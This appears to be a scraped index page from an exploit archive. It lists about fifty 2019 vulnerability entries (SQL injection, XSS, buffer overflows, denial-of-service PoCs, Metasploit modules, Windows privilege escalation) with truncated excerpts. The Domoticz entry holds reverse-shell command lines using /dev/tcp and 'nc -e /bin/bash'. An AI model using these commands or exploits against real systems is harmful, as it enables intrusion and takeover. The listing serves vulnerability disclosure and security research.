Joomla! Component ARI Quiz 3.7.4 - SQL Injection

Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 27, 2019 Vendor Homepage: http://www.ari-soft.com Software Link :...

Intelbras IWR 3000N - Denial of Service (Remote Reboot)

Intelbras IWR 3000N - Denial of Service Remote Reboot /bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a denial ...

Domoticz 4.10577 - Unauthenticated Remote Command Execution

Domoticz 4.10577 - Unauthenticated Remote Command Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

Agent Tesla Botnet - Information Disclosure

Agent Tesla Botnet - Information Disclosure Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows...

HumHub 1.3.12 - Cross-Site Scripting

HumHub 1.3.12 - Cross-Site Scripting Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url :...

Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow

Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free...

Spring Cloud Config 2.1.x - Path Traversal (Metasploit)

Spring Cloud Config 2.1.x - Path Traversal Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an...

NSauditor 3.1.2.0 - Community Denial of Service (PoC)

NSauditor 3.1.2.0 - Community Denial of Service PoC Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version...

Apache Pluto 3.0.0 3.0.1 - Persistent Cross-Site Scripting

Apache Pluto 3.0.0 3.0.1 - Persistent Cross-Site Scripting Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE...

NSauditor 3.1.2.0 - Name Denial of Service (PoC)

NSauditor 3.1.2.0 - Name Denial of Service PoC Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0...

systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process

systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the...

JioFi 4G M2S 1.0.2 - Denial of Service

JioFi 4G M2S 1.0.2 - Denial of Service Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

HeidiSQL 10.1.0.5464 - Denial of Service (PoC)

HeidiSQL 10.1.0.5464 - Denial of Service PoC Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link:...

Backup Key Recovery 2.2.4 - Denial of Service (PoC)

Backup Key Recovery 2.2.4 - Denial of Service PoC Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested...

osTicket 1.11 - Cross-Site Scripting Local File Inclusion

osTicket 1.11 - Cross-Site Scripting Local File Inclusion Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link:...

JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting

JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

Lavavo CD Ripper 4.20 - License Activation Name Buffer Overflow (SEH)

Lavavo CD Ripper 4.20 - License Activation Name Buffer Overflow SEH Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Test...

AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)

AnMing MP3 CD Burner 2.0 - Denial of Service PoC Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link:...

Google Chrome 72.0.3626.121 74.0.3725.0 - NewFixedDoubleArray Integer Overflow

Google Chrome 72.0.3626.121 74.0.3725.0 - NewFixedDoubleArray Integer Overflow VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle Factory::NewFixedDoubleArrayint length, PretenureFlag pretenure DCHECKLE0,...

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t...

systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit

systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on...

Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition

Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition / The Siemens R3964 line discipline code in drivers/tty/nr3964.c has a few races around its ioctl handler; for example, the handler for R3964ENABLESIGNALS just allocates and deletes elements in a linked list with zero locking...

Ross Video DashBoard 8.5.1 - Insecure Permissions

Ross Video DashBoard 8.5.1 - Insecure Permissions Ross Video DashBoard 8.5.1 Insecure Permissions Vendor: Ross Video Ltd. Product web page: https://www.rossvideo.com Affected version: 8.5.1 Summary: DashBoard is a free and open platform from Ross Video for facility control and monitoring that...

Linux - page-_refcount Overflow via FUSE

Linux - page-refcount Overflow via FUSE Linux: page-refcount overflow via FUSE with 140GiB RAM usage Tested on: Debian Buster distro kernel "4.19.0-1-amd64 1 SMP Debian 4.19.12-1 2018-12-22" KVM guest with 160000MiB RAM A while back, there was some discussion about possible overflows of the...

UliCMS 2019.2 2019.1 - Multiple Cross-Site Scripting

UliCMS 2019.2 2019.1 - Multiple Cross-Site Scripting Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Kağan EĞLENCE Vendor Homepage: https://en.ulicms.de/ Version: 2019.2 , 2019.1 CVE : CVE-2019-11398 Vulnerability 1 Url :...

74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)

74CMS 5.0.1 - Cross-Site Request Forgery Add New Admin User Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: http://www.74cms.com/download/index.html Version: v5.0.1 CVE :...

Ease Audio Converter 5.30 - .mp4 Denial of Service (PoC)

Ease Audio Converter 5.30 - .mp4 Denial of Service PoC Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit Date: 19.04.19 Vendor Homepage:http://www.audiotool.net/download.htm Software Link: http://www.audiotool.net/download/audioconverter.exe Exploit Author: Achilles Tested Version...

Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)

Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service PoC var arr1 = 0,1; function ObjCreatemake this.make = make; var obj1 = new ObjCreate; function main arr1.reducef3; Object.getOwnPropertyDescriptorsArray99.joinobj1.make; function f3 obj1"make...

WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery Local File Inclusion

WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery Local File Inclusion Exploit Title: Contact Form Builder CSRF → LFI Date: 2019-03-17 Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-build...

Msvod 10 - Cross-Site Request Forgery (Change User Information)

Msvod 10 - Cross-Site Request Forgery Change User Information Exploit Title: Msvod v10 has a CSRF vulnerability to change user information Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: https://www.msvodx.com/ Version: v10 CVE : CVE-2019-11375...

LabF nfsAxe 3.7 Ping Client - Host IP Buffer Overflow (Direct Ret)

LabF nfsAxe 3.7 Ping Client - Host IP Buffer Overflow Direct Ret !/usr/bin/python Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow Vanilla Date: 20-04-2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: http://www.labf.com/nfsaxe Version: 3.7 Software Link :...

QNAP myQNAPcloud Connect 1.3.4.0317 - UsernamePassword Denial of Service

QNAP myQNAPcloud Connect 1.3.4.0317 - UsernamePassword Denial of Service !/usr/bin/python Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS Date: 19/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.qnap.com Version: 1.3.4.0317 and below are...

ManageEngine Applications Manager 14.0 - Authentication Bypass Remote Command Execution (Metasploit)

ManageEngine Applications Manager 14.0 - Authentication Bypass Remote Command Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager %q This modul...

Oracle Business Intelligence 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - Directory Traversal

Oracle Business Intelligence 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - Directory Traversal Exploit Title: Directory traversal in Oracle Business Intelligence Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link:...

Oracle Business Intelligence XML Publisher 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - XML External Entity Injection

Oracle Business Intelligence XML Publisher 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - XML External Entity Injection Exploit Title: XXE in Oracle Business Intelligence and XML Publisher Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link:...

ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution (Metasploit)

ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module...

Evernote 7.9 - Code Execution via Path Traversal

Evernote 7.9 - Code Execution via Path Traversal Exploit Title: Code execution via path traversal Date: 17-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: http://evernote.com/ Software Link: https://evernote.com/download Version: 7.9 Tested on: macOS Mojave v10.14.4 CVE: CVE-2019-10038...

Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)

Netwide Assembler NASM 2.14rc15 - NULL Pointer Dereference PoC Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D...

Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID

Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID A heap corruption was observed in Oracle Java Runtime Environment version 8u202 latest at the time of this writing while fuzz-testing the processing of TrueType fonts. It manifests itself ...

Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4

Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in scFindExtrema4 A heap corruption was observed in Oracle Java Runtime Environment version 8u202 latest at the time of this writing while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library...

DHCP Server 2.5.2 - Denial of Service (PoC)

DHCP Server 2.5.2 - Denial of Service PoC Exploit Title: DHCP Server 2.5.2 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-16 Vendor Homepage: http://www.dhcpserver.de/cms/ Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments Tested...

ASUS HG100 - Denial of Service

ASUS HG100 - Denial of Service Exploit Title:ASUS HG100 devices denial of serviceDOS via IPv4 packets/SlowHTTPDOS Date: 2019-04-14 Exploit Author: YinT Wang; Vendor Homepage: www.asus.com Version: Hardware version: HG100 、Firmware version: 1.05.12 Tested on: Currnet 1.05.12 CVE : CVE-2018-11492 1...

MailCarrier 2.51 - POP3 RETR SEH Buffer Overflow

MailCarrier 2.51 - POP3 RETR SEH Buffer Overflow !/usr/bin/python Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" commandPOP3 Date: 16/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.tabslab.com/ Version: 2.51 Software Link: N.A Contact...

Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation

Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation Windows: LUAFV LuafvCopyShortName Arbitrary Short Name EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User bounda...

Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation

Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTIONOBJECTPOINTERS Race Condition Privilege Escalation Windows: LUAFV PostLuafvPostReadWrite SECTIONOBJECTPOINTERS Race Condition EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Window...

Microsoft Windows 10 1809 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation

Microsoft Windows 10 1809 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation Windows: CSRSS SxSSrv Cached Manifest EoP Platform: Windows 10 1809, 1709 Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary and others Summary: The SxS manifest...

PCHelpWare V2 1.0.0.5 - SC Denial of Service (PoC)

PCHelpWare V2 1.0.0.5 - SC Denial of Service PoC -- coding: utf-8 -- Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service PoC Date: 15/04/2019 Author: Alejandra Sánchez Vendor Homepage: https://www.uvnc.com/home.html Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi Versio...

Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion

Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion Exploit Title: Joomla Core 1.5.0 through 3.9.4 - Directory Traversal && Authenticated Arbitrary File Deletion Date: 2019-March-13 Exploit Author: Haboob Team Web Site: haboob.sa Email: [email protected] Softwar...

Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation

Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUMACCESS DesiredAccess Privilege Escalation Windows: LUAFV Delayed Virtualization MAXIMUMACCESS DesiredAccess EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service...

Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass

Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass Platform: Windows 10 1809 not tested earlier. Note I’ve not tested this on Windows 10 SMode. Class: Security Feature Bypass Summary: The NtSetCachedSigningLevel...